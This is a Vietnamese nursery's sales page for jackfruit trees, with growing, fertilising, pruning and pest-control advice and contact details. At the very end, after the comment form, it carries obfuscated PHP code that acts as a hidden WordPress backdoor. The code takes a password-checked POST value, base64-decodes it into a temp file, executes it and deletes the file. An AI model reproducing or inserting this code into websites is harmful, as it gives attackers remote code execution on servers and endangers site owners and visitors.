Bán cây mít công trình 2020

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Bên cạnh những cây xanh công trình mang đến nhiều lợi ích cho con người như mang đến những loại gỗ quý chế tác thành những đồ nội thất đẹp mắt với độ bền cực kì cao, chúng còn mang lại nhiều lợi ích về kinh tế cũng như giá trị dinh dưỡng cực kì tốt cho cơ thể.

 

Quả mít ngọt, dai, thơm ngon chính là món ăn bổ dưỡng được rất nhiều người ưa thích. Biết được nhu cầu của các bạn, Vườn Cây Hòa Bình là đơn vị bán cây mít công trình 2020 với nhiều loại cây mít như: mít mật, mít dai… để bạn có nhiều sự lựa chọn đa dạng. Hãy cùng tìm hiểu thông tin cụ thể qua bài viết dưới đây nhé!

 

Bán cây mít công trình 2020
Bán cây mít công trình 2020

 

Tổng quan về cây mít

 

Cây mít thuộc họ Dâu tằm, có nguồn gốc từ Ấn Độ, khi về Việt Nam thường được tròng phổ biến tại Miền Nam bởi đây là nơi có khí hậu nhiệt đới giống Ấn Độ, bên cạnh đó còn được nhân giống tại các nước Đông Nam á như Băng La Đét, Thái Lan. 

 

Cây mít công trình vẫn có thể sống tốt ở những nơi đất nghèo chất dinh dưỡng và phát triển bình thường. 

 

Đặc điểm của cây mít

 

Cây mít công trình là cây thân gỗ nhỡ, khi trưởng thành có chiều cao từ 10 đến 20m. Cây mít bắt đầu cho ra những lứa quả đầu tiên khi cây đạt 3 tuổi. Cây mít được xem là cây ăn quả lớn nhất trong những loài thảo mộc. 

 

Trái mít có kích thước lớn, có hình bầu dục, bên cạnh đó cũng có những quả có những hình thù khác, vỏ quả mít có lớp gai sần xù xì. Cây mít thường ra quả vào giữa mùa xuân và bắt đầu chín vào những ngày cuối mùa hè. Đây thuộc loại quả ngọt nhiệt đới.

 

=> Xem thêm: Cây xoài công trình 2020

 

Bán cây mít công trình 2020
Bán cây mít công trình 2020

 

Mít có đặc điểm khỏe mạnh, sinh trưởng tốt kể cả sống trong điều kiện đất đai có nhiều sỏi đá, nhiều cát, nhưng cây mít lại không chịu được điều kiện ngập úng, thế nên khi trống mít, bạn phải đảm bảo hệ thống thoát nước cực kì tốt cho cây mít. Bên cạnh đó trồng ở những nơi đất giàu dinh dưỡng, chăm bón.

 

Kỹ thuật chăm sóc cây mít

 

Vệ sinh khu vực đất trồng

 

Đây chính là một khâu vô cùng quan trọng quyết định xem cây mít của bạn có thể phát triển tốt hay không, việc làm này khiến cho những loài cây dại như cỏ không có điều kiện cạnh tranh chất dinh dưỡng với cây mít. Khi cây mít bắt đầu ra dễ, khi vệ sinh bạn cần chú ý không quốc đất sâu quá tránh trường hợp làm đứt rễ.

 

Tưới nước cho cây mít công trình

 

Trong thời kì đầu khi trồng cây mít, bạn cần phải cung cấp đầy đủ lượng nước cho cây, khi cây được tuổi, bạn hạn chế tưới nước cho cây mít Khi vào mùa mưa, thì bạn không cần phải tưới nước cho cây nữa.

 

Bón phân cho cây mít công trình

 

Đây chính là yếu tố để bạn có thể thưởng thức những trái mít thơm ngon ngọt lịm, dai, giòn. Cây Mít cần lượng phân bón cần thiết là khoảng 5kg phân chuồng hoai mục bón trực tiếp vào gốc cây. Bên cạnh đó bạn hãy bón thêm khoảng 0,4kg phân lân giúp cây có tốc độ phục hồi và phát triển rễ nhanh hơn và để lá cây phát triển thuận lợi bạn cần bón phân AT01 khoảng 0,4kg/ gốc

 

– Trong thời kì cây chuẩn bị ra hoa, bạn hãy bón phân AT02 khoảng 0,4kg để cây có thể ra đều hoa. 

 

– Sau khi bạn đã thu hoạch hết mùa ra trái của cây mít công trình, bạn cần phải bón cho cây khoảng 0,4kg phân AT03 cho mỗi gốc cây giúp quả lớn nhanh hơn. 

 

Bán cây mít công trình 2020
Bán cây mít công trình 2020

 

– Một tháng trước khi thu hoạch, bạn hãy bón cho cây mít phân NPK (13-7-19 +TE) sẽ giúp quả lớn hơn, cứng cáp, phòng ngừa khả năng bị thối rữa. 

 

Khi cây đã đạt được 4 tuổi, sau mỗi lần thu hoạch, bạn cần bón cho cây 1kg phân hóa học với vôi bột vùng và 25kg phân chuồng đã ủ hoai mục. 

 

Tỉa cành cho cây mít công trình

 

Từ lúc trống cây, đến khi cây đã phát triển chiều cao được 1m, khi tỉa cành bạn cần phải phụ thuộc vào xem cây đã ra quả hay chưa. 

 

Những cây đã ra quả, bạn thực hiện quá trình tỉa cành một năm một lần sau khi đa thu hoạch xong hết quả. Còn với những cây chưa ra quả, bạn cần tiến hành tỉa cành khoảng 2 đến 3 lần 1 năm. 

 

Chú ý loại bỏ những cành nhỏ, cành không mọc đúng hướng, cành mọc sát đất, cành bị sâu bệnh. Điều này sẽ giúp cây được thông thoáng phòng tránh sâu bệnh, cung cấp đầy đủ khí oxy cho cây.

 

Phòng trừ sâu bệnh cho cây mít công trình

 

Bạn cần chú ý sự phát triển cho cây, phòng tránh những loại sâu bệnh độc hại như: Bệnh thối gốc, chảy nhựa, sâu đục thân, sâu đục cành, rầy, rệp hại mít, sâu đục trái mít, bạn cần phải sử dụng những loại thuốc trừ sâu như: Bassa 50EC, Cyperan 5 EC.

 

=> Xem thêm: Tìm hiểu về cây bàng Đài Loan

 

Bán cây mít công trình 2020
Bán cây mít công trình 2020

 

Vườn Cây Hòa Bình – Bán cây mít công trình uy tín, chất lượng

 

Vườn Cây Hòa Bình là đơn vị cung cấp, phân phối những cây mít công trình với giống khỏe mạnh, quả thơm ngon từ mít mật cho đến mít thường. 

 

Những cây được những người thợ của chúng tôi chăm sóc một cách tỉ mỉ, nhiệt huyết, mang đến quý khách hàng những cây công trình 2020 chất lượng, dáng đẹp, tươi tốt, mà giá thành lại phải chăng, bạn dễ dàng có một cây mít trang trí, mang lại bóng mát cho sân vườn nhà mình mà lại có trái mít bổ dưỡng.

 

Thông tin chi tiết vui lòng liên hệ:

 

– Hotline: 0962.376.560

– Bán hàng: 0962.376.560

– Nguyễn Trường Giang

– Địa chỉ: Cầu Mai Lĩnh, Biên giang , Hà Đông ,Hà Nội

 

Dịch vụ cung cấp cây trồng giá rẻ tại Hà Nội

 

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}